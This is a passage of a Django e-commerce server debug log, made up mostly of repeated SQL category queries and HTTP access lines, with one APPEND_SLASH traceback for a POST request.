"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:50:12,387 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:50:12,391 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:50:12,395 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:50:12,399 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:50:12,403 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:50:12,407 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:50:12,411 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:50:12,415 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:50:12,420 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:50:12,424 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:50:12] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 06:50:14,964 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 06:50:14,968 utils 4252 140031747061504 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 06:50:14] "GET /api/v1/fire/ HTTP/1.0" 200 482 [19/Dec/2019 06:50:15] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [19/Dec/2019 06:50:15] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [19/Dec/2019 06:50:15] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [19/Dec/2019 06:53:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:57:25] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:57:36] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:59:15] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 07:02:11] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 07:04:53] "HEAD / HTTP/1.0" 302 0 [19/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:15:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:20:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:29:09] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:34:11] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:39:14] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 07:44:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:49:19] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:54:45] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:56:15] "GET / HTTP/1.0" 302 0 [19/Dec/2019 07:59:47] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:10:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:24:10] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 08:26:02] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:31:46] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:38:16] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [19/Dec/2019 08:39:32] "POST /editBlackAndWhiteList HTTP/1.0" 500 63913 [19/Dec/2019 08:45:10] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:50:13] "GET / HTTP/1.0" 302 0 [19/Dec/2019 08:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 08:57:57] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:00:40] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:02:58] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:10:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:15:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:20:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:23:03,250 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:23:03,257 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:23:03,260 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:23:03,263 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:23:03,266 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:23:03,269 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:23:03,271 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:23:03,273 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:23:03,275 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:23:03,279 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:23:03,281 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:23:03,283 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:23:03,285 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:23:03,288 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:23:03,291 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:23:03,294 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:23:03,296 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:23:03,298 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:23:03,300 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:23:03,304 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:23:03,306 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:23:03,308 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:23:03,311 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:23:03,313 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:23:03,315 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:23:03,319 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:23:03,322 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:23:03,324 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:23:03,326 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:23:03,328 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:23:03,332 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:23:03,334 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:23:03,337 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:23:03,339 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:23:03,341 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:23:03,345 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:23:03,348 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:23:03,350 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:23:03,352 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:23:03,356 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:23:03,359 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:23:03,362 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:23:03,364 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:23:03,367 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:23:03,369 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:23:03,372 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 